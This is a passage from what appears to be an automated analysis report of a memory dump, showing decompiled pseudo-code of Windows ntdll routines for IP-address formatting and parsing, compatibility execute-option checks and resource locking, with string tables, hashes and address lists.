                                                        									_t128 = _t128 + E00B77707() * 2;
                                                        									_t71 = _v20;
                                                        									_t130 = _t130 + 0xc;
                                                        								}
                                                        								_t78 = E00B77707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                        								_t130 = _t130 + 0x10;
                                                        							} else {
                                                        								_push(L"::");
                                                        								_push(_t71 - _t128 >> 1);
                                                        								_push(_t128);
                                                        								_t78 = E00B77707();
                                                        								_t130 = _t130 + 0xc;
                                                        								_t91 = _a8 - 1;
                                                        							}
                                                        							_t91 = _t91 + 1;
                                                        							_t128 = _t128 + _t78 * 2;
                                                        							_t71 = _v20;
                                                        							if(_t91 >= _v8) {
                                                        								goto L22;
                                                        							}
                                                        							_t116 = 0;
                                                        							goto L14;
                                                        						}
                                                        					} else {
                                                        						_t108 = 1;
                                                        						_v16 = _t129;
                                                        						_v24 = _t90;
                                                        						do {
                                                        							if( *_v16 == _t116) {
                                                        								if(_t108 - _v12 > _a8 - _a4) {
                                                        									_a4 = _v12;
                                                        									_a8 = _t108;
                                                        								}
                                                        								_t116 = 0;
                                                        							} else {
                                                        								_v12 = _t108;
                                                        							}
                                                        							_v16 = _v16 + 2;
                                                        							_t108 = _t108 + 1;
                                                        							_t26 =  &_v24;
                                                        							 *_t26 = _v24 - 1;
                                                        						} while ( *_t26 != 0);
                                                        						goto L11;
                                                        					}
                                                        				}
                                                        			}





















                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                        • API String ID: 48624451-2108815105
                                                        • Opcode ID: 9e90dae71d72478fa5715dbd458c797150a3711a8526268684392413ddde9e20
                                                        • Instruction ID: 332373df834e7a34b17b2b5d7973265f6ef2bd857e7da91f57264a5686d611fe
                                                        • Opcode Fuzzy Hash: 9e90dae71d72478fa5715dbd458c797150a3711a8526268684392413ddde9e20
                                                        • Instruction Fuzzy Hash: AD6147B1904655AACB24EF5DC8808BF7BF9EF95300B18C8ADF4AA47650D634AA41DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 64%
                                                        			E00B77EFD(void* __ecx, intOrPtr _a4) {
                                                        				signed int _v8;
                                                        				char _v540;
                                                        				unsigned int _v544;
                                                        				signed int _v548;
                                                        				intOrPtr _v552;
                                                        				char _v556;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int _t33;
                                                        				void* _t38;
                                                        				unsigned int _t46;
                                                        				unsigned int _t47;
                                                        				unsigned int _t52;
                                                        				intOrPtr _t56;
                                                        				unsigned int _t62;
                                                        				void* _t69;
                                                        				void* _t70;
                                                        				intOrPtr _t72;
                                                        				signed int _t73;
                                                        				void* _t74;
                                                        				void* _t75;
                                                        				void* _t76;
                                                        				void* _t77;
                                                        
                                                        				_t33 =  *0xc22088; // 0x76fbb2c1
                                                        				_v8 = _t33 ^ _t73;
                                                        				_v548 = _v548 & 0x00000000;
                                                        				_t72 = _a4;
                                                        				if(E00B77F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                        					__eflags = _v548;
                                                        					if(_v548 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t62 = _t72 + 0x24;
                                                        					E00B93F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
                                                        					_t71 = 0x214;
                                                        					_v544 = 0x214;
                                                        					E00B4DFC0( &_v540, 0, 0x214);
                                                        					_t75 = _t74 + 0x20;
                                                        					_t46 =  *0xc24218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
                                                        					__eflags = _t46;
                                                        					if(_t46 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					_t47 = _v544;
                                                        					__eflags = _t47;
                                                        					if(_t47 == 0) {
                                                        						goto L1;
                                                        					}
                                                        					__eflags = _t47 - 0x214;
                                                        					if(_t47 >= 0x214) {
                                                        						goto L1;
                                                        					}
                                                        					_push(_t62);
                                                        					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
                                                        					E00B93F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
                                                        					_t52 = E00B50D27( &_v540, L"Execute=1");
                                                        					_t76 = _t75 + 0x1c;
                                                        					_push(_t62);
                                                        					__eflags = _t52;
                                                        					if(_t52 == 0) {
                                                        						E00B93F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
                                                        						_t71 =  &_v540;
                                                        						_t56 = _t73 + _v544 - 0x218;
                                                        						_t77 = _t76 + 0x14;
                                                        						_v552 = _t56;
                                                        						__eflags = _t71 - _t56;
                                                        						if(_t71 >= _t56) {
                                                        							goto L1;
                                                        						} else {
                                                        							goto L10;
                                                        						}
                                                        						while(1) {
                                                        							L10:
                                                        							_t62 = E00B58375(_t71, 0x20);
                                                        							_pop(_t69);
                                                        							__eflags = _t62;
                                                        							if(__eflags != 0) {
                                                        								__eflags = 0;
                                                        								 *_t62 = 0;
                                                        							}
                                                        							E00B93F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
                                                        							_t77 = _t77 + 0x10;
                                                        							E00BBE8DB(_t69, _t70, __eflags, _t72, _t71);
                                                        							__eflags = _t62;
                                                        							if(_t62 == 0) {
                                                        								goto L1;
                                                        							}
                                                        							_t31 = _t62 + 2; // 0x2
                                                        							_t71 = _t31;
                                                        							__eflags = _t71 - _v552;
                                                        							if(_t71 >= _v552) {
                                                        								goto L1;
                                                        							}
                                                        						}
                                                        					}
                                                        					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
                                                        					_push(3);
                                                        					_push(0x55);
                                                        					E00B93F92();
                                                        					_t38 = 1;
                                                        					L2:
                                                        					return E00B4E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
                                                        				}
                                                        				L1:
                                                        				_t38 = 0;
                                                        				goto L2;
                                                        			}




























                                                        APIs
                                                        • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B93F12
                                                        Strings
                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B93F75
                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B93EC4
                                                        • ExecuteOptions, xrefs: 00B93F04
                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B9E345
                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B9E2FB
                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B93F4A
                                                        • Execute=1, xrefs: 00B93F5E
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: BaseDataModuleQuery
                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                        • API String ID: 3901378454-484625025
                                                        • Opcode ID: 42c37a44a3630d9a053616ab1525b3885e70b09afc6c8ffd97459186ced183d7
                                                        • Instruction ID: a99b4f40ac2215f913c748046992d2964088fef7006c3251bacb43abb7776f38
                                                        • Opcode Fuzzy Hash: 42c37a44a3630d9a053616ab1525b3885e70b09afc6c8ffd97459186ced183d7
                                                        • Instruction Fuzzy Hash: 2741B371A8021CBBDF209B94DCD6FEA73FCAF14700F0045E9F519A6091EA709B459B61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00B80B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _v32;
                                                        				void* _t108;
                                                        				void* _t116;
                                                        				char _t120;
                                                        				short _t121;
                                                        				void* _t128;
                                                        				intOrPtr* _t130;
                                                        				char _t132;
                                                        				short _t133;
                                                        				intOrPtr _t141;
                                                        				signed int _t156;
                                                        				signed int _t174;
                                                        				intOrPtr _t177;
                                                        				intOrPtr* _t179;
                                                        				intOrPtr _t180;
                                                        				void* _t183;
                                                        
                                                        				_t179 = _a4;
                                                        				_t141 =  *_t179;
                                                        				_v16 = 0;
                                                        				_v28 = 0;
                                                        				_v8 = 0;
                                                        				_v24 = 0;
                                                        				_v12 = 0;
                                                        				_v32 = 0;
                                                        				_v20 = 0;
                                                        				if(_t141 == 0) {
                                                        					L41:
                                                        					 *_a8 = _t179;
                                                        					_t180 = _v24;
                                                        					if(_t180 != 0) {
                                                        						if(_t180 != 3) {
                                                        							goto L6;
                                                        						}
                                                        						_v8 = _v8 + 1;
                                                        					}
                                                        					_t174 = _v32;
                                                        					if(_t174 == 0) {
                                                        						if(_v8 == 7) {
                                                        							goto L43;
                                                        						}
                                                        						goto L6;
                                                        					}
                                                        					L43:
                                                        					if(_v16 != 1) {
                                                        						if(_v16 != 2) {
                                                        							goto L6;
                                                        						}
                                                        						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                        						L47:
                                                        						if(_t174 != 0) {
                                                        							E00B58980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                        							_t116 = 8;
                                                        							E00B4DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                        						}
                                                        						return 0;
                                                        					}
                                                        					if(_t180 != 0) {
                                                        						if(_v12 > 3) {
                                                        							goto L6;
                                                        						}
                                                        						_t120 = E00B80CFA(_v28, 0, 0xa);
                                                        						_t183 = _t183 + 0xc;
                                                        						if(_t120 > 0xff) {
                                                        							goto L6;
                                                        						}
                                                        						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                        						goto L47;
                                                        					}
                                                        					if(_v12 > 4) {
                                                        						goto L6;
                                                        					}
                                                        					_t121 = E00B80CFA(_v28, _t180, 0x10);
                                                        					_t183 = _t183 + 0xc;
                                                        					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                        					goto L47;
                                                        				} else {
                                                        					while(1) {
                                                        						_t123 = _v16;
                                                        						if(_t123 == 0) {
                                                        							goto L7;
                                                        						}
                                                        						_t108 = _t123 - 1;
                                                        						if(_t108 != 0) {
                                                        							goto L1;
                                                        						}
                                                        						_t178 = _t141;
                                                        						if(E00B806BA(_t108, _t141) == 0 || _t135 == 0) {
                                                        							if(E00B806BA(_t135, _t178) == 0 || E00B80A5B(_t136, _t178) == 0) {
                                                        								if(_t141 != 0x3a) {
                                                        									if(_t141 == 0x2e) {
                                                        										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                        											goto L41;
                                                        										} else {
                                                        											_v24 = _v24 + 1;
                                                        											L27:
                                                        											_v16 = _v16 & 0x00000000;
                                                        											L28:
                                                        											if(_v28 == 0) {
                                                        												goto L20;
                                                        											}
                                                        											_t177 = _v24;
                                                        											if(_t177 != 0) {
                                                        												if(_v12 > 3) {
                                                        													L6:
                                                        													return 0xc000000d;
                                                        												}
                                                        												_t132 = E00B80CFA(_v28, 0, 0xa);
                                                        												_t183 = _t183 + 0xc;
                                                        												if(_t132 > 0xff) {
                                                        													goto L6;
                                                        												}
                                                        												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                        												goto L20;
                                                        											}
                                                        											if(_v12 > 4) {
                                                        												goto L6;
                                                        											}
                                                        											_t133 = E00B80CFA(_v28, 0, 0x10);
                                                        											_t183 = _t183 + 0xc;
                                                        											_v20 = _v20 + 1;
                                                        											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                        											goto L20;
                                                        										}
                                                        									}
                                                        									goto L41;
                                                        								}
                                                        								if(_v24 > 0 || _v8 > 6) {
                                                        									goto L41;
                                                        								} else {
                                                        									_t130 = _t179 + 1;
                                                        									if( *_t130 == _t141) {
                                                        										if(_v32 != 0) {
                                                        											goto L41;
                                                        										}
                                                        										_v32 = _v8 + 1;
                                                        										_t156 = 2;
                                                        										_v8 = _v8 + _t156;
                                                        										L34:
                                                        										_t179 = _t130;
                                                        										_v16 = _t156;
                                                        										goto L28;
                                                        									}
                                                        									_v8 = _v8 + 1;
                                                        									goto L27;
                                                        								}
                                                        							} else {
                                                        								_v12 = _v12 + 1;
                                                        								if(_v24 > 0) {
                                                        									goto L41;
                                                        								}
                                                        								_a7 = 1;
                                                        								goto L20;
                                                        							}
                                                        						} else {
                                                        							_v12 = _v12 + 1;
                                                        							L20:
                                                        							_t179 = _t179 + 1;
                                                        							_t141 =  *_t179;
                                                        							if(_t141 == 0) {
                                                        								goto L41;
                                                        							}
                                                        							continue;
                                                        						}
                                                        						L7:
                                                        						if(_t141 == 0x3a) {
                                                        							if(_v24 > 0 || _v8 > 0) {
                                                        								goto L41;
                                                        							} else {
                                                        								_t130 = _t179 + 1;
                                                        								if( *_t130 != _t141) {
                                                        									goto L41;
                                                        								}
                                                        								_v20 = _v20 + 1;
                                                        								_t156 = 2;
                                                        								_v32 = 1;
                                                        								_v8 = _t156;
                                                        								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                        								goto L34;
                                                        							}
                                                        						}
                                                        						L8:
                                                        						if(_v8 > 7) {
                                                        							goto L41;
                                                        						}
                                                        						_t142 = _t141;
                                                        						if(E00B806BA(_t123, _t141) == 0 || _t124 == 0) {
                                                        							if(E00B806BA(_t124, _t142) == 0 || E00B80A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                        								goto L41;
                                                        							} else {
                                                        								_t128 = 1;
                                                        								_a7 = 1;
                                                        								_v28 = _t179;
                                                        								_v16 = 1;
                                                        								_v12 = 1;
                                                        								L39:
                                                        								if(_v16 == _t128) {
                                                        									goto L20;
                                                        								}
                                                        								goto L28;
                                                        							}
                                                        						} else {
                                                        							_a7 = 0;
                                                        							_v28 = _t179;
                                                        							_v16 = 1;
                                                        							_v12 = 1;
                                                        							goto L20;
                                                        						}
                                                        					}
                                                        				}
                                                        				L1:
                                                        				_t123 = _t108 == 1;
                                                        				if(_t108 == 1) {
                                                        					goto L8;
                                                        				}
                                                        				_t128 = 1;
                                                        				goto L39;
                                                        			}


























                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID: __fassign
                                                        • String ID: .$:$:
                                                        • API String ID: 3965848254-2308638275
                                                        • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction ID: 869d2ac79ee744b81cea8c7edb310d99615b494688bca63cf6be48264a2bbf88
                                                        • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                        • Instruction Fuzzy Hash: FBA1BF3192430ADFDBA4FF54C8856BEBBF4EF05384F2485EAD812A7261D6309A49CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E00B80554(signed int _a4, char _a8) {
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				signed int* _t49;
                                                        				signed int _t51;
                                                        				signed int _t56;
                                                        				signed int _t58;
                                                        				signed int _t61;
                                                        				signed int _t63;
                                                        				void* _t66;
                                                        				intOrPtr _t67;
                                                        				void* _t69;
                                                        				signed int _t70;
                                                        				void* _t75;
                                                        				signed int _t81;
                                                        				signed int _t84;
                                                        				void* _t86;
                                                        				signed int _t93;
                                                        				signed int _t96;
                                                        				intOrPtr _t105;
                                                        				signed int _t107;
                                                        				void* _t110;
                                                        				signed int _t115;
                                                        				signed int* _t119;
                                                        				void* _t125;
                                                        				void* _t126;
                                                        				signed int _t128;
                                                        				signed int _t130;
                                                        				signed int _t138;
                                                        				signed int _t144;
                                                        				void* _t158;
                                                        				void* _t159;
                                                        				void* _t160;
                                                        
                                                        				_t96 = _a4;
                                                        				_t115 =  *(_t96 + 0x28);
                                                        				_push(_t138);
                                                        				if(_t115 < 0) {
                                                        					_t105 =  *[fs:0x18];
                                                        					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                        					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                        						goto L6;
                                                        					} else {
                                                        						__eflags = _t115 | 0xffffffff;
                                                        						asm("lock xadd [eax], edx");
                                                        						return 1;
                                                        					}
                                                        				} else {
                                                        					L6:
                                                        					_push(_t128);
                                                        					while(1) {
                                                        						L7:
                                                        						__eflags = _t115;
                                                        						if(_t115 >= 0) {
                                                        							break;
                                                        						}
                                                        						__eflags = _a8;
                                                        						if(_a8 == 0) {
                                                        							__eflags = 0;
                                                        							return 0;
                                                        						} else {
                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        							_t49 = _t96 + 0x1c;
                                                        							_t106 = 1;
                                                        							asm("lock xadd [edx], ecx");
                                                        							_t115 =  *(_t96 + 0x28);
                                                        							__eflags = _t115;
                                                        							if(_t115 < 0) {
                                                        								L23:
                                                        								_t130 = 0;
                                                        								__eflags = 0;
                                                        								while(1) {
                                                        									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                        									asm("sbb esi, esi");
                                                        									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c201c0;
                                                        									_push(_t144);
                                                        									_push(0);
                                                        									_t51 = E00B3F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                        									__eflags = _t51 - 0x102;
                                                        									if(_t51 != 0x102) {
                                                        										break;
                                                        									}
                                                        									_t106 =  *(_t144 + 4);
                                                        									_t126 =  *_t144;
                                                        									_t86 = E00B84FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                        									_push(_t126);
                                                        									_push(_t86);
                                                        									E00B93F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                        									E00B93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        									_t130 = _t130 + 1;
                                                        									_t160 = _t158 + 0x28;
                                                        									__eflags = _t130 - 2;
                                                        									if(__eflags > 0) {
                                                        										E00BC217A(_t106, __eflags, _t96);
                                                        									}
                                                        									_push("RTL: Re-Waiting\n");
                                                        									_push(0);
                                                        									_push(0x65);
                                                        									E00B93F92();
                                                        									_t158 = _t160 + 0xc;
                                                        								}
                                                        								__eflags = _t51;
                                                        								if(__eflags < 0) {
                                                        									_push(_t51);
                                                        									E00B83915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                                        									asm("int3");
                                                        									while(1) {
                                                        										L32:
                                                        										__eflags = _a8;
                                                        										if(_a8 == 0) {
                                                        											break;
                                                        										}
                                                        										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                        										_t119 = _t96 + 0x24;
                                                        										_t107 = 1;
                                                        										asm("lock xadd [eax], ecx");
                                                        										_t56 =  *(_t96 + 0x28);
                                                        										_a4 = _t56;
                                                        										__eflags = _t56;
                                                        										if(_t56 != 0) {
                                                        											L40:
                                                        											_t128 = 0;
                                                        											__eflags = 0;
                                                        											while(1) {
                                                        												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                                        												asm("sbb esi, esi");
                                                        												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c201c0;
                                                        												_push(_t138);
                                                        												_push(0);
                                                        												_t58 = E00B3F8CC( *((intOrPtr*)(_t96 + 0x20)));
                                                        												__eflags = _t58 - 0x102;
                                                        												if(_t58 != 0x102) {
                                                        													break;
                                                        												}
                                                        												_t107 =  *(_t138 + 4);
                                                        												_t125 =  *_t138;
                                                        												_t75 = E00B84FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                                        												_push(_t125);
                                                        												_push(_t75);
                                                        												E00B93F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                                        												E00B93F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                        												_t128 = _t128 + 1;
                                                        												_t159 = _t158 + 0x28;
                                                        												__eflags = _t128 - 2;
                                                        												if(__eflags > 0) {
                                                        													E00BC217A(_t107, __eflags, _t96);
                                                        												}
                                                        												_push("RTL: Re-Waiting\n");
                                                        												_push(0);
                                                        												_push(0x65);
                                                        												E00B93F92();
                                                        												_t158 = _t159 + 0xc;
                                                        											}
                                                        											__eflags = _t58;
                                                        											if(__eflags < 0) {
                                                        												_push(_t58);
                                                        												E00B83915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                                        												asm("int3");
                                                        												_t61 =  *_t107;
                                                        												 *_t107 = 0;
                                                        												__eflags = _t61;
                                                        												if(_t61 == 0) {
                                                        													L1:
                                                        													_t63 = E00B65384(_t138 + 0x24);
                                                        													if(_t63 != 0) {
                                                        														goto L52;
                                                        													} else {
                                                        														goto L2;
                                                        													}
                                                        												} else {
                                                        													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                                        													_push( &_a4);
                                                        													_push(_t61);
                                                        													_t70 = E00B3F970( *((intOrPtr*)(_t138 + 0x18)));
                                                        													__eflags = _t70;
                                                        													if(__eflags >= 0) {
                                                        														goto L1;
                                                        													} else {
                                                        														_push(_t70);
                                                        														E00B83915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                                        														L52:
                                                        														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                                        														_push( &_a4);
                                                        														_push(1);
                                                        														_t63 = E00B3F970( *((intOrPtr*)(_t138 + 0x20)));
                                                        														__eflags = _t63;
                                                        														if(__eflags >= 0) {
                                                        															L2:
                                                        															return _t63;
                                                        														} else {
                                                        															_push(_t63);
                                                        															E00B83915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                                        															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                                        															_push( &_a4);
                                                        															_push(1);
                                                        															_t63 = E00B3F970( *((intOrPtr*)(_t138 + 0x20)));
                                                        															__eflags = _t63;
                                                        															if(__eflags >= 0) {
                                                        																goto L2;
                                                        															} else {
                                                        																_push(_t63);
                                                        																_t66 = E00B83915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                                        																asm("int3");
                                                        																while(1) {
                                                        																	_t110 = _t66;
                                                        																	__eflags = _t66 - 1;
                                                        																	if(_t66 != 1) {
                                                        																		break;
                                                        																	}
                                                        																	_t128 = _t128 | 0xffffffff;
                                                        																	_t66 = _t110;
                                                        																	asm("lock cmpxchg [ebx], edi");
                                                        																	__eflags = _t66 - _t110;
                                                        																	if(_t66 != _t110) {
                                                        																		continue;
                                                        																	} else {
                                                        																		_t67 =  *[fs:0x18];
                                                        																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                                        																		return _t67;
                                                        																	}
                                                        																	goto L59;
                                                        																}
                                                        																E00B65329(_t110, _t138);
                                                        																_t69 = E00B653A5(_t138, 1);
                                                        																return _t69;
                                                        															}
                                                        														}
                                                        													}
                                                        												}
                                                        											} else {
                                                        												_t56 =  *(_t96 + 0x28);
                                                        												goto L3;
                                                        											}
                                                        										} else {
                                                        											_t107 =  *_t119;
                                                        											__eflags = _t107;
                                                        											if(__eflags > 0) {
                                                        												while(1) {
                                                        													_t81 = _t107;
                                                        													asm("lock cmpxchg [edi], esi");
                                                        													__eflags = _t81 - _t107;
                                                        													if(_t81 == _t107) {
                                                        														break;
                                                        													}
                                                        													_t107 = _t81;
                                                        													__eflags = _t81;
                                                        													if(_t81 > 0) {
                                                        														continue;
                                                        													}
                                                        													break;
                                                        												}
                                                        												_t56 = _a4;
                                                        												__eflags = _t107;
                                                        											}
                                                        											if(__eflags != 0) {
                                                        												while(1) {
                                                        													L3:
                                                        													__eflags = _t56;
                                                        													if(_t56 != 0) {
                                                        														goto L32;
                                                        													}
                                                        													_t107 = _t107 | 0xffffffff;
                                                        													_t56 = 0;
                                                        													asm("lock cmpxchg [edx], ecx");
                                                        													__eflags = 0;
                                                        													if(0 != 0) {
                                                        														continue;
                                                        													} else {
                                                        														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                        														return 1;
                                                        													}
                                                        													goto L59;
                                                        												}
                                                        												continue;
                                                        											} else {
                                                        												goto L40;
                                                        											}
                                                        										}
                                                        										goto L59;
                                                        									}
                                                        									__eflags = 0;
                                                        									return 0;
                                                        								} else {
                                                        									_t115 =  *(_t96 + 0x28);
                                                        									continue;
                                                        								}
                                                        							} else {
                                                        								_t106 =  *_t49;
                                                        								__eflags = _t106;
                                                        								if(__eflags > 0) {
                                                        									while(1) {
                                                        										_t93 = _t106;
                                                        										asm("lock cmpxchg [edi], esi");
                                                        										__eflags = _t93 - _t106;
                                                        										if(_t93 == _t106) {
                                                        											break;
                                                        										}
                                                        										_t106 = _t93;
                                                        										__eflags = _t93;
                                                        										if(_t93 > 0) {
                                                        											continue;
                                                        										}
                                                        										break;
                                                        									}
                                                        									__eflags = _t106;
                                                        								}
                                                        								if(__eflags != 0) {
                                                        									continue;
                                                        								} else {
                                                        									goto L23;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L59;
                                                        					}
                                                        					_t84 = _t115;
                                                        					asm("lock cmpxchg [esi], ecx");
                                                        					__eflags = _t84 - _t115;
                                                        					if(_t84 != _t115) {
                                                        						_t115 = _t84;
                                                        						goto L7;
                                                        					} else {
                                                        						return 1;
                                                        					}
                                                        				}
                                                        				L59:
                                                        			}
                                                        0x00ba22d6
                                                        0x00ba22d7
                                                        0x00ba22da
                                                        0x00ba22df
                                                        0x00ba22e4
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba22e6
                                                        0x00ba22e9
                                                        0x00ba22f4
                                                        0x00ba22f9
                                                        0x00ba22fa
                                                        0x00ba2305
                                                        0x00ba2314
                                                        0x00ba2319
                                                        0x00ba231a
                                                        0x00ba231d
                                                        0x00ba2320
                                                        0x00ba2323
                                                        0x00ba2323
                                                        0x00ba2328
                                                        0x00ba232d
                                                        0x00ba232f
                                                        0x00ba2331
                                                        0x00ba2336
                                                        0x00ba2336
                                                        0x00ba233b
                                                        0x00ba233d
                                                        0x00ba2350
                                                        0x00ba2351
                                                        0x00ba2356
                                                        0x00ba2359
                                                        0x00ba2359
                                                        0x00ba235b
                                                        0x00ba235d
                                                        0x00b65367
                                                        0x00b6536b
                                                        0x00b65372
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00ba2363
                                                        0x00ba2363
                                                        0x00ba2369
                                                        0x00ba236a
                                                        0x00ba236c
                                                        0x00ba2371
                                                        0x00ba2373
                                                        0x00000000
                                                        0x00ba2379
                                                        0x00ba2379
                                                        0x00ba237a
                                                        0x00ba237f
                                                        0x00ba237f
                                                        0x00ba2385
                                                        0x00ba2386
